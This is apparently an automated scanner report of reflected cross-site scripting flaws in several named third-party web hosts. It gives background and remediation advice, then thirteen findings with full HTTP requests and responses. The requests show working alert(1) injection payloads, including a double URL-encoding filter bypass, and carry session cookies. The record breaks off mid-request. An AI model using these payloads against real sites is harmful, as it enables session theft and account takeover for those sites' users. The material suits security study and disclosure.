XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10032011-03

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://display.digitalriver.com/ [aid parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://display.digitalriver.com
Path:	/

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee7e8'-alert(1)-'c7efbc052f0 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?aid=244ee7e8'-alert(1)-'c7efbc052f0&tax=jrny HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.journeyed.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:02:13 GMT
Server: Apache/2.2.9
Expires: Mon, 03 Oct 2011 20:32:13 GMT
Last-Modified: Mon, 03 Oct 2011 20:02:13 GMT
Content-Length: 230
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=244ee7e8'-alert(1)-'c7efbc052f0&tax=jrny';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.2. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://display.digitalriver.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aca66'-alert(1)-'9386163b3ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?aid=244&tax=jrny&aca66'-alert(1)-'9386163b3ed=1 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.journeyed.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:02:14 GMT
Server: Apache/2.2.9
Expires: Mon, 03 Oct 2011 20:32:14 GMT
Last-Modified: Mon, 03 Oct 2011 20:02:14 GMT
Content-Length: 233
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=244&tax=jrny&aca66'-alert(1)-'9386163b3ed=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.3. http://display.digitalriver.com/ [tax parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://display.digitalriver.com
Path:	/

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f87e'-alert(1)-'b68a4c7359b was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?aid=244&tax=jrny4f87e'-alert(1)-'b68a4c7359b HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.journeyed.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 20:02:14 GMT
Server: Apache/2.2.9
Expires: Mon, 03 Oct 2011 20:32:14 GMT
Last-Modified: Mon, 03 Oct 2011 20:02:14 GMT
Content-Length: 230
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=244&tax=jrny4f87e'-alert(1)-'b68a4c7359b';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.4. http://maplesoft.tt.omtrdc.net/m2/maplesoft/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://maplesoft.tt.omtrdc.net
Path:	/m2/maplesoft/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 674fa<script>alert(1)</script>6f4b3b09bb7 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/maplesoft/mbox/standard?mboxHost=www.maplesoft.com&mboxSession=1317672433761-966952&mboxPage=1317672433761-966952&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=Step-GlobalMaplesoftcom674fa<script>alert(1)</script>6f4b3b09bb7&mboxId=0&mboxTime=1317654434048&mboxURL=http%3A%2F%2Fwww.maplesoft.com%2F&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: maplesoft.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.maplesoft.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317672433761-966952.19; Domain=maplesoft.tt.omtrdc.net; Expires=Wed, 02-Nov-2011 20:08:01 GMT; Path=/m2/maplesoft
Content-Type: text/javascript
Content-Length: 219
Date: Mon, 03 Oct 2011 20:08:00 GMT
Server: Test & Target

mboxFactories.get('default').get('Step-GlobalMaplesoftcom674fa<script>alert(1)</script>6f4b3b09bb7',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317672433761-966952.19");

1.5. http://maplesoft.tt.omtrdc.net/m2/maplesoft/sc/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://maplesoft.tt.omtrdc.net
Path:	/m2/maplesoft/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload a5dfc<img%20src%3da%20onerror%3dalert(1)>2e3bb5bed67 was submitted in the mbox parameter. This input was echoed as a5dfc<img src=a onerror=alert(1)>2e3bb5bed67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/maplesoft/sc/standard?mboxHost=www.maplesoft.com&mboxSession=1317672433761-966952&mboxPage=1317672433761-966952&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=SiteCatalyst%3A%20eventa5dfc<img%20src%3da%20onerror%3dalert(1)>2e3bb5bed67&mboxId=0&mboxTime=1317654435241&charSet=ISO-8859-1&visitorNamespace=maplesoft&pageName=Home%20Page&server=North%20America&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cmp4%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Cmw%2Cmws%2Cmsim&linkInternalFilters=javascript%3A%2Cmaplesoft.com%2Cmapleprimes.com%2Cmaplesoft.ch%2Cmaplesoft.fr%2Caustralia.maplesoft.com%2Cmapleoracles.maplesoft.com%2Cwebstore.maplesoft.com&linkTrackVars=None&linkTrackEvents=None&prop3=english&prop13=Non-Member&eVar13=Non-Member&mboxURL=http%3A%2F%2Fwww.maplesoft.com%2F&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: maplesoft.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.maplesoft.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317672433761-966952.19; Domain=maplesoft.tt.omtrdc.net; Expires=Wed, 02-Nov-2011 20:08:56 GMT; Path=/m2/maplesoft
Content-Length: 264
Date: Mon, 03 Oct 2011 20:08:56 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317672433761-966952.19");mboxFactories.get('default').get('SiteCatalyst: eventa5dfc<img src=a onerror=alert(1)>2e3bb5bed67', 0).setOffer(new mboxOfferDefault()).loaded();}

1.6. http://maplesoft.tt.omtrdc.net/m2/maplesoft/sc/standard [mboxId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://maplesoft.tt.omtrdc.net
Path:	/m2/maplesoft/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload 898f4<script>alert(1)</script>81a6228c395 was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/maplesoft/sc/standard?mboxHost=www.maplesoft.com&mboxSession=1317672433761-966952&mboxPage=1317672433761-966952&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=SiteCatalyst%3A%20event&mboxId=0898f4<script>alert(1)</script>81a6228c395&mboxTime=1317654435241&charSet=ISO-8859-1&visitorNamespace=maplesoft&pageName=Home%20Page&server=North%20America&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cmp4%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Cmw%2Cmws%2Cmsim&linkInternalFilters=javascript%3A%2Cmaplesoft.com%2Cmapleprimes.com%2Cmaplesoft.ch%2Cmaplesoft.fr%2Caustralia.maplesoft.com%2Cmapleoracles.maplesoft.com%2Cwebstore.maplesoft.com&linkTrackVars=None&linkTrackEvents=None&prop3=english&prop13=Non-Member&eVar13=Non-Member&mboxURL=http%3A%2F%2Fwww.maplesoft.com%2F&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: maplesoft.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.maplesoft.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317672433761-966952.19; Domain=maplesoft.tt.omtrdc.net; Expires=Wed, 02-Nov-2011 20:08:58 GMT; Path=/m2/maplesoft
Content-Length: 261
Date: Mon, 03 Oct 2011 20:08:58 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317672433761-966952.19");mboxFactories.get('default').get('SiteCatalyst: event', 0898f4<script>alert(1)</script>81a6228c395).setOffer(new mboxOfferDefault()).loaded();}

1.7. http://ptc.sharedvue.net/sharedvue/resources/dyn/hit/370965846.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ptc.sharedvue.net
Path:	/sharedvue/resources/dyn/hit/370965846.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b05d9%253cscript%253ealert%25281%2529%253c%252fscript%253ef51dd29202e was submitted in the REST URL parameter 4. This input was echoed as b05d9<script>alert(1)</script>f51dd29202e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sharedvue/resources/dyn/hitb05d9%253cscript%253ealert%25281%2529%253c%252fscript%253ef51dd29202e/370965846.gif?new=true&return=false&pid=3&sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0&stype=server&surl=http%3A//www.nxrev.com/content-0%3Fq%3Dnode/179 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 490
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:05:08 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:05:08 GMT

<strong>/sharedvue/dyn/hitb05d9%3cscript%3ealert%281%29%3c%2fscript%3ef51dd29202e/370965846.gif?new=true&return=false&pid=3&sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0&stype=server&surl=htt
...[SNIP]...
<br />
Redirect to: /sharedvue/hitb05d9<script>alert(1)</script>f51dd29202e/370965846.gif?new=true&return=false&pid=3&sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0&stype=server&surl=http://www.nxrev.com/content-0?q=node/179

1.8. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965861.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ptc.sharedvue.net
Path:	/sharedvue/resources/dyn/tick/370965861.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 29360%253cscript%253ealert%25281%2529%253c%252fscript%253ec5d404e0e7 was submitted in the REST URL parameter 4. This input was echoed as 29360<script>alert(1)</script>c5d404e0e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /sharedvue/resources/dyn/tick29360%253cscript%253ealert%25281%2529%253c%252fscript%253ec5d404e0e7/370965861.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 308
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:05:30 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:05:30 GMT

<strong>/sharedvue/dyn/tick29360%3cscript%3ealert%281%29%3c%2fscript%3ec5d404e0e7/370965861.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/tick29360<script>alert(1)</script>c5d404e0e7/370965861.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.9. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965876.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ptc.sharedvue.net
Path:	/sharedvue/resources/dyn/tick/370965876.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c4192%253cscript%253ealert%25281%2529%253c%252fscript%253e38c130dc4ec was submitted in the REST URL parameter 4. This input was echoed as c4192<script>alert(1)</script>38c130dc4ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /sharedvue/resources/dyn/tickc4192%253cscript%253ealert%25281%2529%253c%252fscript%253e38c130dc4ec/370965876.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 310
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:05:38 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:05:38 GMT

<strong>/sharedvue/dyn/tickc4192%3cscript%3ealert%281%29%3c%2fscript%3e38c130dc4ec/370965876.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/tickc4192<script>alert(1)</script>38c130dc4ec/370965876.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.10. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965891.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ptc.sharedvue.net
Path:	/sharedvue/resources/dyn/tick/370965891.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c6393%253cscript%253ealert%25281%2529%253c%252fscript%253e7dace5d5f19 was submitted in the REST URL parameter 4. This input was echoed as c6393<script>alert(1)</script>7dace5d5f19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /sharedvue/resources/dyn/tickc6393%253cscript%253ealert%25281%2529%253c%252fscript%253e7dace5d5f19/370965891.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 310
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:06:08 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:06:09 GMT

<strong>/sharedvue/dyn/tickc6393%3cscript%3ealert%281%29%3c%2fscript%3e7dace5d5f19/370965891.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/tickc6393<script>alert(1)</script>7dace5d5f19/370965891.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.11. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965906.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ptc.sharedvue.net
Path:	/sharedvue/resources/dyn/tick/370965906.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload af64a%253cscript%253ealert%25281%2529%253c%252fscript%253e4038a418d9e was submitted in the REST URL parameter 4. This input was echoed as af64a<script>alert(1)</script>4038a418d9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /sharedvue/resources/dyn/tickaf64a%253cscript%253ealert%25281%2529%253c%252fscript%253e4038a418d9e/370965906.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 310
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:06:08 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:06:09 GMT

<strong>/sharedvue/dyn/tickaf64a%3cscript%3ealert%281%29%3c%2fscript%3e4038a418d9e/370965906.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/tickaf64a<script>alert(1)</script>4038a418d9e/370965906.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.12. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965921.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ptc.sharedvue.net
Path:	/sharedvue/resources/dyn/tick/370965921.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f01e5%253cscript%253ealert%25281%2529%253c%252fscript%253eb054ae797c1 was submitted in the REST URL parameter 4. This input was echoed as f01e5<script>alert(1)</script>b054ae797c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /sharedvue/resources/dyn/tickf01e5%253cscript%253ealert%25281%2529%253c%252fscript%253eb054ae797c1/370965921.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nxrev.com/content-0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBDACQD=EOGKPBHAJNNBMCFEFKJGBHCC; BIGipServersv0-web-http=899536202.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 310
Content-Type: text/html
Expires: Sun, 02 Oct 2011 20:06:20 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 20:06:19 GMT

<strong>/sharedvue/dyn/tickf01e5%3cscript%3ealert%281%29%3c%2fscript%3eb054ae797c1/370965921.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0</strong><br /><br />
Redirect to: /sharedvue/tickf01e5<script>alert(1)</script>b054ae797c1/370965921.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0

1.13. http://ptc.sharedvue.net/sharedvue/resources/dyn/tick/370965936.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ptc.sharedvue.net
Path:	/sharedvue/resources/dyn/tick/370965936.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a342f%253cscript%253ealert%25281%2529%253c%252fscript%253e8dc35401c8a was submitted in the REST URL parameter 4. This input was echoed as a342f<script>alert(1)</script>8dc35401c8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /sharedvue/resources/dyn/ticka342f%253cscript%253ealert%25281%2529%253c%252fscript%253e8dc35401c8a/370965936.gif?sid=096549faa6a9d4a0d1169c5c9e9d83ab&prvid=0 HTTP/1.1
Host: ptc.sharedvue.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
